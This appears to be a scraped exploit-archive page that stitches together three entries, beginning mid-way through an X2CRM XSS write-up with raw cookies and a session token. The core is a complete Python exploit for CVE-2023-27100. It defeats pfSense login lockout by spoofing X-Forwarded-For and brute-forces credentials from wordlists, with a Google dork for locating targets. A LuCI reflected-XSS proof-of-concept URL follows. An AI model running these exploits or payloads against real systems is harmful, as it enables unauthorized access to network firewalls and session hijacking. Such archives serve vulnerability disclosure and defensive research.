d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1EXPLOITATION========1. Select Import Records Model in admin settings2. Inject payload to the vulnerable parameter in GET requestPayload: "><body onload="alert(4)">'''

X2CRM 6.6 / 6.9 Cross Site Scripting

pfsenseCE version 2.6.0 suffers from an anti-brute force protection bypass vulnerability.

    #!/usr/bin/python3## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass## Google Dork: intitle:"pfSense - Login"## Date: 2023-04-07## Exploit Author: FabDotNET (Fabien MAISONNETTE)## Vendor Homepage: https://www.pfsense.org/## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz## Version: pfSenseCE <= 2.6.0## CVE: CVE-2023-27100# Vulnerability## CVE: CVE-2023-27100## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66import requestsimport sysimport reimport argparseimport textwrapfrom urllib3.exceptions import InsecureRequestWarning# Expected Argumentsparser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",                                 formatter_class=argparse.RawTextHelpFormatter,                                 epilog=textwrap.dedent(''' Exploit Usage : ./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)")parser.add_argument("-u", "--usersList", help="Username Dictionary")parser.add_argument("-p", "--passwdList", help="Password Dictionary")args = parser.parse_args()if len(sys.argv) < 2:    print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")    sys.exit(1)# Variableurl = args.urlusersList = args.usersListpasswdList = args.passwdList# Suppress only the single warning from urllib3 needed.if url.upper().startswith("HTTPS://"):    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')def login(userlogin, userpasswd):    session = requests.session()    r = session.get(url, verify=False)    # Getting CSRF token value    csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)    csrftoken = csrftoken.group(1)    # Specifying Headers Value    headerscontent = {        'User-Agent': 'Mozilla/5.0',        'Referer': f"{url}",        'X-Forwarded-For': '42.42.42.42'    }    # POST REQ data    postreqcontent = {        '__csrf_magic': f"{csrftoken}",        'usernamefld': f"{userlogin}",        'passwordfld': f"{userpasswd}",        'login': 'Sign+In'    }    # Sending POST REQ    r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)    # Conditional loops    if r.status_code != 200:        print(f'[*] - Found Valid Credential !!')        print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")        sys.exit(0)# Reading User.txt & Pass.txt filesuserfile = open(usersList).readlines()passfile = open(passwdList).readlines()for user in userfile:    user = user.strip()    for passwd in passfile:        passwd = passwd.strip()        login(user, passwd)

pfsenseCE 2.6.0 Protection Bypass

LuCI openwrt-22.03 branch git-22.361.69894-438c598 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /openvpn/pageswitch.htm.

**Impact**

An attacker can send this URL with a malicious payload to genuine Luci user which can lead to execution of payload on Luci console. It can lead to session hijacking attacks. The vulnerability can further help attackers to bypass protection mechanism like same origin policy (CSP) and Anti-CSRF tokens.

**Proof of Concept**

1.  Login to Luci Console using valid credentials.
2.  Paste below payload in Browser window.

Payload: <img src=a onerror=alert('xss')>

https://{your-luci-ip}/cgi-bin/luci/root/vpn/openvpn/basic/sample\_serverjyo69%3Cimg%20src%3da%20onerror%3dalert('xss')%3Ezja1d

You will see JavaScript being executed and XSS pop-up will appear. Please find attached Proof of concept video for more details.

**Patches**

openwrt/luci@25983b9  
openwrt/luci@749268a

**Workarounds**

It is recommended to pull the patch from the OpenWRT LuCi Repository to mitigate this vulnerability.

Tag

#csrf